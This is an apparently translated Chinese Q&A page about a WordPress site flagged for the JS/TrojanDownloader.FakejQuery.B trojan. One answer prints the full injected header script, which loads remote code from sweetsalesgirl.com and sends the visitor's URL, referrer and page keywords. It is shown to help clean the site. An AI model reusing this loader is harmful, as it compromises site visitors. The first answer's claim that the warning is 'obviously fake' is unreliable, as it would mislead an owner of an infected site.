我的wordpress网站上发现了威胁
自从我将我的网站连接到域名后,我就开始尝试访问这个网站的一些计算机:
阻止访问该网页。显示网址
威胁:JS / TrojanDownloader.FakejQuery.B木马
我该怎么办?
2 个答案:
答案 0 :(得分:0)
如果您要通过主机访问您的域名,我会与他们联系以获取解释。同时/如果您自己托管它,我会尝试在站点上运行Shodan扩展程序以检查可能影响连接客户端的其他活动端口。仔细检查所有的javascript文件,看看是否有些可疑。
根据我的经验,这显然是假的。它看起来更像是勒索软件会使用的东西而不是真正的木马。如果您的网站上没有任何javascript,那么我几乎可以保证它不是真的。
答案 1 :(得分:0)
我刚刚遇到这篇文章,因为我有一个客户的网站遭到这种病毒的攻击。该网站不是我想添加的,并运行Wordpress 3.6(现在很老)。
我浏览了主题文件,发现这已添加到标题中:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
我发现从主题的标题中删除了这个木马的警告消失了。
值得删除。
相关问题
最新问题
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?